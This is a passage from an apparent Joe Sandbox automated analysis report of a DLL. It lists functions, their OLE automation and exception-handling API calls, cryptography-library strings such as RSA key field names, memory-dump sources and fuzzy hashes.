                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RSa
                                                                                                          • API String ID: 4225690600-3169278968
                                                                                                          • Opcode ID: 0f9169d6dd7ac4e7a51b2a854e244ae6bc4d52618dc0242c9d72595d0d65cc6a
                                                                                                          • Instruction ID: d48c2e1eab9473ba25429f14b923bd97f30e8126eb3dfe0ccdfd760d9f821433
                                                                                                          • Opcode Fuzzy Hash: 0f9169d6dd7ac4e7a51b2a854e244ae6bc4d52618dc0242c9d72595d0d65cc6a
                                                                                                          • Instruction Fuzzy Hash: BD310874E00618DFCB10DFA9C980B9EB7F9AF89200F2085AAE519E7252DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0406F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RSqb
                                                                                                          • API String ID: 4225690600-347567867
                                                                                                          • Opcode ID: 0435cedffad78d234ac40eb5449d18430b924d8393a87725d300db7c43a8294c
                                                                                                          • Instruction ID: 038963370dc6223c6d313325cf4f8af0409c238fa7e3714910076f68a5588434
                                                                                                          • Opcode Fuzzy Hash: 0435cedffad78d234ac40eb5449d18430b924d8393a87725d300db7c43a8294c
                                                                                                          • Instruction Fuzzy Hash: 78310974E00618DFCB10DF69C980B9DB7F9AF89200F20859AE519E7251DB75E9818F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RS3g
                                                                                                          • API String ID: 4225690600-2794631155
                                                                                                          • Opcode ID: 10abed155de295d9daadd2849d335d225c39225bb2371187b2aee9b2c063ef89
                                                                                                          • Instruction ID: 84dd7aadedf37ee7972ffc9d79efbbbeb8b988c849b4c99852ab6cca0fe802e9
                                                                                                          • Opcode Fuzzy Hash: 10abed155de295d9daadd2849d335d225c39225bb2371187b2aee9b2c063ef89
                                                                                                          • Instruction Fuzzy Hash: ED310A74A00618DFCB00DFA9CD80B9DB7F9AF89200F2086A6E519E7295DB71E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RS:h
                                                                                                          • API String ID: 4225690600-3891202347
                                                                                                          • Opcode ID: a6ad88cd668ecccfa8e1303d0b3af0a3b83369d3bb98b9961cf0449bdf91ccf4
                                                                                                          • Instruction ID: 98fffe0d09793a178d9725af5a7d31e910343725c21cc4d448cfcee434fd1522
                                                                                                          • Opcode Fuzzy Hash: a6ad88cd668ecccfa8e1303d0b3af0a3b83369d3bb98b9961cf0449bdf91ccf4
                                                                                                          • Instruction Fuzzy Hash: CF311970E00608DFDB00DF69CD80B9EB7F9AF89200F2085A6E418E7256DB71E9818F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07C760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • type_info::operator!=.LIBCMT ref: 6F07C7EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: type_info::operator!=
                                                                                                          • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                                                                                          • API String ID: 2241493438-339133643
                                                                                                          • Opcode ID: 14905c6fb32a2de8ba3cdc0445f90b342a4bd30cdea22f3e9ceb4cc928a0c34b
                                                                                                          • Instruction ID: 97f94f516abb3347b926350d9d458ced16b52c1db968743600ad0a45db2bffea
                                                                                                          • Opcode Fuzzy Hash: 14905c6fb32a2de8ba3cdc0445f90b342a4bd30cdea22f3e9ceb4cc928a0c34b
                                                                                                          • Instruction Fuzzy Hash: DB318074A183408EC7249F78C84574AFBF1AFC5208F108AAEF4459B364EF71D848CB8A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RS%e
                                                                                                          • API String ID: 4225690600-1409579784
                                                                                                          • Opcode ID: cece33eb77b8af89a3a857a902e3c58bed358fe8bef817d612382dc6e80a847a
                                                                                                          • Instruction ID: 242aa78796488c2d0c5dd6b507f447be23bff6e9c4367ed49ac3e6f489c63ec0
                                                                                                          • Opcode Fuzzy Hash: cece33eb77b8af89a3a857a902e3c58bed358fe8bef817d612382dc6e80a847a
                                                                                                          • Instruction Fuzzy Hash: 11311A70A00618DFDB10CBA9CD80B9DB7F9AF85300F2485AAE559E7252C775E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2610073882-0
                                                                                                          • Opcode ID: 1cbabebfdca510cabffb68269a9fb8174d4b46faeb65a82fa2e5bca150669ba2
                                                                                                          • Instruction ID: e99e138971c8648a3a98b3525ad85cf621357c40d30aa907c33c8d09dfa47faf
                                                                                                          • Opcode Fuzzy Hash: 1cbabebfdca510cabffb68269a9fb8174d4b46faeb65a82fa2e5bca150669ba2
                                                                                                          • Instruction Fuzzy Hash: ABC15776A087029FC700CF68C880E5AB7E6FFC9304F648A4EF5958B261D735E845CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F039DEB
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F039DFB
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F039E29
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F039F25
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F039FE5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3214203402-2766056989
                                                                                                          • Opcode ID: d6cc1ec80f5b7ba7dcd51f7974e935482c7e1975aabe364bb6763420463856a0
                                                                                                          • Instruction ID: 007c9fef5650572d21f15a66aaac03612dd9a43882d89577b460cad6a307175b
                                                                                                          • Opcode Fuzzy Hash: d6cc1ec80f5b7ba7dcd51f7974e935482c7e1975aabe364bb6763420463856a0
                                                                                                          • Instruction Fuzzy Hash: 78D16B76E0025ACFDB00DFA8C980B9DB7F6FF88304F648169E515AB354DB31AA45CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F03B3EB
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F03B3FB
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F03B429
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F03B525
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03B5E5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3214203402-2766056989
                                                                                                          • Opcode ID: 868c57fa4737da6ca64e886bb62de10f47ccc3e83f85cf3bf3e07a2879b802c2
                                                                                                          • Instruction ID: 65c30e41bbea8b3594e7fa686aaca58860295b1041bce49d988795dc7af6f2b8
                                                                                                          • Opcode Fuzzy Hash: 868c57fa4737da6ca64e886bb62de10f47ccc3e83f85cf3bf3e07a2879b802c2
                                                                                                          • Instruction Fuzzy Hash: 9FD16BB2D0066ACFDF00DFA8C980B9DBBF5BF88308F648169D515AB255D734AA45CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F087FE0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 325COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0880EA
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                          • String ID: Max$Min$RandomNumberType$T|o$invalid bit length
                                                                                                          • API String ID: 3718517217-1939620930
                                                                                                          • Opcode ID: 8a3b756aff1924ec1b7b90103625b5dc8ff1679f40cd011ba59b25a3cdcc88b7
                                                                                                          • Instruction ID: 630aef21294ec58677df72a5764737b9d034f070c529303aa3c817971058a9cd
                                                                                                          • Opcode Fuzzy Hash: 8a3b756aff1924ec1b7b90103625b5dc8ff1679f40cd011ba59b25a3cdcc88b7
                                                                                                          • Instruction Fuzzy Hash: D1C18C7550C7809BE724CB68C950B8FB7E5BFD9314F444A2CE599833A1EB749908CBA3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F061580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0616B2
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F06180A
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          Strings
                                                                                                          • : this key is too short to encrypt any messages, xrefs: 6F06162A
                                                                                                          • for this public key, xrefs: 6F061771
                                                                                                          • : message length of , xrefs: 6F06170D
                                                                                                          • exceeds the maximum of , xrefs: 6F06173F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                                                                                          • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                                                                                          • API String ID: 3807434085-412673420
                                                                                                          • Opcode ID: 4893e78f3256faf24ad5f813ee7adbc8080a0fb3fdaaac14fb083c4540c8ae78
                                                                                                          • Instruction ID: d87c9f38439a2350e9c15977b0e475f9fe9a9ebc536c58f101e6d19fda33e5a3
                                                                                                          • Opcode Fuzzy Hash: 4893e78f3256faf24ad5f813ee7adbc8080a0fb3fdaaac14fb083c4540c8ae78
                                                                                                          • Instruction Fuzzy Hash: 5BB16E75508380AFD324DB69C890F9BB7E9AFD9308F04891DE59D83391DB71A905CBA3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03D4B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03D5E4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03D5F9
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03D608
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03D61D
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
